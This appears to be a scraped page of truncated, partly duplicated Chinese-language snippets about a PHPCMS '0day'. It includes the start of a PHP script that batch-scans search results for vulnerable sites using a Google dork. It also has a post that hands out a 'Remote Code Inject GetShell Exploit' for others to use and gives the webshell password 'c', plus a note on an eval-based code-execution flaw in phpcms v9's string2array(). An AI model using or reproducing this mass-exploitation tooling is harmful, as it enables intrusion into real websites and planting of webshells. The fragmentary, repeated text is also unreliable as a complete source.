phpcms-exp 0day
<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...
<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit ...
phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 function string2array($data) { if($data == '') return array(); eval("\$array = $data;"); return $array; } 比如投票结果统计(需要后台权限) /moudles/vo...